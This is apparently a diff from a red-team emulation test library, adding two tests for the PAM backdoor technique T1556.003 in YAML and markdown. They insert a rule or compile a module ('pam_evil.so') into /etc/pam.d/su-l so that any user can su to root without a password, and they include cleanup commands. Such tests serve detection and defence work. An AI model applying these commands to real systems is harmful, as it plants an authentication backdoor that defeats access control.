+        Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient pam_succeed_if.so uid >= 0
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
+    - name: Malicious PAM module
+      auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
+      description: |
+        Creates a PAM module, inserts a rule to use it, and then tests it.
+
+        Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient /tmp/pam_evil.so
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+        path_to_pam_module_source:
+          description: Path to PAM module source code.
+          type: path
+          default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+        path_to_pam_module:
+          description: Path to PAM module object
+          type: path
+          default: "/tmp/pam_evil.so"
+      dependencies:
+      - description: 'The PAM development library must be installed to build the PAM
+          module
+
+'
+        prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
+          0; else exit 1; fi;
+
+'
+        get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
+          libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
+          fi
+
+'
+      - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
+
+'
+        prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
+          fi;
+
+'
+        get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
  T1205.001:
    technique:
      external_references:
@@ -44678,7 +44864,100 @@ persistence:
      x_mitre_platforms:
      - Linux
      - macOS
-    atomic_tests: []
+      identifier: T1556.003
+    atomic_tests:
+    - name: Malicious PAM rule
+      auto_generated_guid: 4b9dde80-ae22-44b1-a82a-644bf009eb9c
+      description: |
+        Inserts a rule into a PAM config and then tests it.
+
+        Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient pam_succeed_if.so uid >= 0
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
+    - name: Malicious PAM module
+      auto_generated_guid: 65208808-3125-4a2e-8389-a0a00e9ab326
+      description: |
+        Creates a PAM module, inserts a rule to use it, and then tests it.
+
+        Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+      supported_platforms:
+      - linux
+      input_arguments:
+        path_to_pam_conf:
+          description: PAM config file to modify.
+          type: string
+          default: "/etc/pam.d/su-l"
+        pam_rule:
+          description: Rule to add to the PAM config.
+          type: string
+          default: auth sufficient /tmp/pam_evil.so
+        index:
+          description: Index where the rule is inserted.
+          type: integer
+          default: 1
+        path_to_pam_module_source:
+          description: Path to PAM module source code.
+          type: path
+          default: PathToAtomicsFolder/T1556.003/src/pam_evil.c
+        path_to_pam_module:
+          description: Path to PAM module object
+          type: path
+          default: "/tmp/pam_evil.so"
+      dependencies:
+      - description: 'The PAM development library must be installed to build the PAM
+          module
+
+'
+        prereq_command: 'if [ -f /usr/include/security/pam_modules.h ]; then exit
+          0; else exit 1; fi;
+
+'
+        get_prereq_command: 'if [ -n "`which apt-get`" ]; then sudo apt-get -y install
+          libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel;
+          fi
+
+'
+      - description: 'The PAM module must exist on disk at specified location (#{path_to_pam_module})
+
+'
+        prereq_command: 'if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1;
+          fi;
+
+'
+        get_prereq_command: 'sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+
+'
+      executor:
+        name: sh
+        elevation_required: true
+        command: 'sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+
+'
+        cleanup_command: 'sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+
+'
  T1205.001:
    technique:
      external_references:
@@ -0,0 +1,120 @@
+# T1556.003 - Pluggable Authentication Modules
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1556/003)
+<blockquote>Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is <code>pam_unix.so</code>, which retrieves, sets, and verifies account authentication information in <code>/etc/passwd</code> and <code>/etc/shadow</code>.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
+
+Adversaries may modify components of the PAM system to create backdoors. PAM components, such as <code>pam_unix.so</code>, can be patched to accept arbitrary adversary supplied values as legitimate credentials.(Citation: PAM Backdoor)
+
+Malicious modifications to the PAM system may also be abused to steal credentials. Adversaries may infect PAM resources with code to harvest user credentials, since the values exchanged with PAM components may be plain-text since PAM does not store passwords.(Citation: PAM Creds)(Citation: Apple PAM)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Malicious PAM rule](#atomic-test-1---malicious-pam-rule)
+
+- [Atomic Test #2 - Malicious PAM module](#atomic-test-2---malicious-pam-module)
+
+
+<br/>
+
+## Atomic Test #1 - Malicious PAM rule
+Inserts a rule into a PAM config and then tests it.
+
+Upon successful execution, this test will insert a rule that allows every user to su to root without a password.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 4b9dde80-ae22-44b1-a82a-644bf009eb9c
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l|
+| pam_rule | Rule to add to the PAM config. | string | auth sufficient pam_succeed_if.so uid >= 0|
+| index | Index where the rule is inserted. | integer | 1|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+```
+
+#### Cleanup Commands:
+```sh
+sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+```
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Malicious PAM module
+Creates a PAM module, inserts a rule to use it, and then tests it.
+
+Upon successful execution, this test will create a PAM module that allows every user to su to root without a password.
+
+**Supported Platforms:** Linux
+
+
+**auto_generated_guid:** 65208808-3125-4a2e-8389-a0a00e9ab326
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| path_to_pam_conf | PAM config file to modify. | string | /etc/pam.d/su-l|
+| pam_rule | Rule to add to the PAM config. | string | auth sufficient /tmp/pam_evil.so|
+| index | Index where the rule is inserted. | integer | 1|
+| path_to_pam_module_source | Path to PAM module source code. | path | PathToAtomicsFolder/T1556.003/src/pam_evil.c|
+| path_to_pam_module | Path to PAM module object | path | /tmp/pam_evil.so|
+
+
+#### Attack Commands: Run with `sh`!  Elevation Required (e.g. root or admin) 
+
+
+```sh
+sudo sed -i "#{index}s,^,#{pam_rule}\n,g" #{path_to_pam_conf}
+```
+
+#### Cleanup Commands:
+```sh
+sudo sed -i "\,#{pam_rule},d" #{path_to_pam_conf}
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: The PAM development library must be installed to build the PAM module
+##### Check Prereq Commands:
+```sh
+if [ -f /usr/include/security/pam_modules.h ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+if [ -n "`which apt-get`" ]; then sudo apt-get -y install libpam0g-dev; elif [ -n "`which yum`" ]; then sudo yum -y install pam-devel; fi
+```
+##### Description: The PAM module must exist on disk at specified location (#{path_to_pam_module})
+##### Check Prereq Commands:
+```sh
+if [ -f #{path_to_pam_module} ]; then exit 0; else exit 1; fi;
+```
+##### Get Prereq Commands:
+```sh
+sudo gcc -shared -fPIC -o #{path_to_pam_module} #{path_to_pam_module_source}
+```
+
+
+
+
+<br/>